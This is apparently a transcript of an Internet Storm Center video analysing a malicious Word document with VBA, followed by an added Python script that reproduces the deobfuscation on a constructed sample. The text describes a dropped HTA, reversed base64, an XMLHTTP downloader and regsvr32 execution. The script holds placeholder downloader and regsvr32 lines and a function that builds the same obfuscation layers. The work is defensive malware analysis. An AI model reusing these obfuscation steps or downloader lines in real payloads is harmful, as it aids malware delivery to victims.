Hello, Didier Stevens here, Senior Handler at the Internet Storm Center. Rieder Collin submitted a malicious document, an Office document, a Word document with VBA code. I did the analysis in this diary entry and now I'm going to show it here in this video.

So let's run oledump. Okay, so we have VBA code, and also you can see here that the file vbaProject.bin was found in the word folder. So this is an OOXML file. So the extension is not . . . the real extension is actually not . . . but . . m, okay. Now these look small, so I'm going to select all, because I don't expect there to be much VBA code since the streams are small, and indeed that's what we have here. So here you have a Document_Open, so that's a start: something is executed. Looking for keywords in the document properties, and also ActiveDocument content. So something is done with the content of the document, okay.

So first the keywords. So let's run zipdump. The keywords are here in the core file of the document properties. Now if you don't know that, you can just search for them: with zipdump, do a YARA search with an ad hoc rule just for "keywords", string keywords. And then you will see that it is found here in file 15, and of course also in vbaProject.bin, because it is referenced there. So I can select this file 15 and do a dump. And indeed here we can see keywords. So let's do a pretty print of this XML with my tool xmldump. And here you have the keywords value. And if you take a close look, this looks like a reversed file path: see, colon, users and home. So let's reverse this. So first I'm going to print this differently, having all the values for the different elements, the text inside. And here I'm going to grep for keywords, okay. So that is what we want to reverse. That is something you can do with my translate tool. Normally translate operates byte per byte, but if you give it option -f, it operates on the full file in one go.
And here I'm going to give it a function to reverse the string. So in Python, there is no function to reverse a string; I have to do this with a lambda function, for example, and what you have to do is make a slice like this to reverse the characters. Okay, and now indeed we can see in users public pow pow next dot hta. So an .hta file is written to disk.

Let's now take a look at the content of the document. The content is in the word document file here, so file 4. I am selecting file 4 and doing a dump. Okay, and that's already unusual, all those dollar and one signs. Now my xmldump tool can extract the content of a Word document, the text; it's called the wordtext command. And here you have the text that is inside the document. Now this is a well-known obfuscation method, where a repeating string is inserted to obfuscate the actual text, and the string that you see here a lot is dollar one. Let's remove this dollar one with a stream editor: I'm going to substitute dollar one with nothing, and do that globally. And now you can see that we have a script here, html and script. So this is HTA, and this looks like base64. So let's pass this to my base64 tool. Okay, we have a lot of false positives here, so let's put a minimum on the size, let's say 20. Okay, and here we have the base64 string. Let's select this. Okay, this doesn't look familiar to me, so it's not another script. Let's look at the information. So entropy is 6.5; only about half of the character set is used. So this is definitely not something compressed. Maybe this is shellcode. I can dump it and do a quick test with my XORSearch tool, running rules with option -W, capital W, running rules to detect shellcode. And here nothing is detected. So this is probably not shellcode, neither compressed. What could it be? Let's go back here to the HTA and let me replace the semicolons by a semicolon and a newline; we'll add a newline after every semicolon to make it a bit more readable.
That is the script. So here we see the base64. This looks like code to do base64 decoding. And here we have a reverse, so something is being reversed. And then we also have a split here, so let's grep for that split, for the separator. And the split separator is also somewhere here in the base64. Here it is. So this is not one base64 string; there are probably two, because of the separator. And now if you look here, this is not how base64-encoded data should start; it should end with this. So this is reversed. So let's reverse this. That's reversed. And now let's pass this to base64. These two things here, they decode now indeed to something that looks like a script. So let me select item number two and do a dump. Yeah, this is a reversed script. So again, the decoded base64 code must be reversed. So let's do another translate, take a slice and reverse this. Okay. And now we have here execution: run regsvr32 of a file in users public tube girlload.gpg. Okay, but we don't have a .gpg file yet. And of course, if you see regsvr32, this will not be a .gpg file. So let's take a look at the other script, that was number three. Okay. And this is a downloader, XMLHTTP. This is the URL here from where it is being downloaded, and then it is saved to a file with the .gpg extension. Okay. Now I tried to download this, or to find it on VirusTotal, but I had no success. I couldn't obtain the actual file.
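The decoding chain walked through in the video (remove the repeated junk string, carve the base64 blob, reverse it, split on the separator, base64-decode each part, reverse the decoded script, and reverse the keywords property to get the dropped file path) as one Python script. This is an added example, not code from the diary entry or from the tools used in the video. All of the sample data is constructed: the junk string `$1` and the `@@` separator, the two stand-in scripts, the `example.invalid` URL and the `sample.gpg` / `sample.hta` file names are placeholders, not the real document's values; the `rev` and `b64decode` names inside the generated HTA are only illustrative. The block builds an obfuscated sample in the forward direction and then recovers the scripts from it, so it runs offline.

```python
import base64
import re

# Everything below is a constructed stand-in for this example; none of it is
# the content of the document analysed in the video.
JUNK = "$1"   # repeating string inserted into the document text
SEP = "@@"    # separator between the two base64 blobs (a palindrome, so it
              # reads the same before and after the reversal step)

SCRIPT_DOWNLOADER = ('var x=new ActiveXObject("MSXML2.XMLHTTP");'
                     'x.open("GET","http://example.invalid/stage2",false);'
                     'x.send();')
SCRIPT_RUNNER = ('new ActiveXObject("WScript.Shell")'
                 '.Run("regsvr32 /s C:\\\\Users\\\\Public\\\\sample.gpg");')


def reverse(s):
    """Reverse a string: the same slice translate.py -f runs on the whole file."""
    return s[::-1]


def obfuscate(scripts, junk=JUNK, sep=SEP, period=3):
    """Build the layered HTA in the forward direction: reverse each script,
    base64-encode it, join the blobs with the separator, reverse the result,
    wrap it in HTA markup and insert the junk string every `period` characters.
    (rev and b64decode are illustrative names, not a real HTA runtime.)"""
    blobs = [base64.b64encode(reverse(s).encode()).decode() for s in scripts]
    payload = reverse(sep.join(blobs))
    hta = ('<html><script>var p="%s";var a=rev(p).split("%s");'
           'for(var i=0;i<a.length;i++){eval(rev(b64decode(a[i])));}'
           '</script></html>' % (payload, sep))
    return junk.join(hta[i:i + period] for i in range(0, len(hta), period))


def strip_junk(text, junk=JUNK):
    """Equivalent of sed 's/\\$1//g': delete every copy of the junk string."""
    return text.replace(junk, "")


def extract_blob(text, sep=SEP, minlen=20):
    """Like base64dump.py with a minimum length: return the longest run of
    base64-alphabet characters (plus the separator's characters)."""
    alphabet = "A-Za-z0-9+/=" + re.escape(sep)
    runs = re.findall("[%s]{%d,}" % (alphabet, minlen), text)
    return max(runs, key=len) if runs else ""


def deobfuscate(hta_text, junk=JUNK, sep=SEP):
    """Undo the layers in the order the analysis found them: strip the junk,
    carve the blob, reverse it, split on the separator, base64-decode each
    part and reverse the decoded script."""
    blob = extract_blob(strip_junk(hta_text, junk), sep)
    return [reverse(base64.b64decode(part).decode())
            for part in reverse(blob).split(sep)]


def recover_path(keywords_value):
    """The document-property trick: the keywords value is the dropped file
    path written backwards."""
    return reverse(keywords_value)


if __name__ == "__main__":
    sample = obfuscate([SCRIPT_DOWNLOADER, SCRIPT_RUNNER])
    for n, script in enumerate(deobfuscate(sample), 1):
        print("script %d: %s" % (n, script))
    # constructed keywords value, written backwards like the real one was
    print(recover_path(reverse("C:\\Users\\Public\\sample.hta")))
```

Two caveats when reusing this on a real sample: the junk string must not occur legitimately anywhere in the HTA (here `$` is outside the base64 alphabet, which is why a global delete is safe), and if the separator is not a palindrome you have to check from the script whether the split happens before or after the reversal, because the separator itself comes out backwards otherwise.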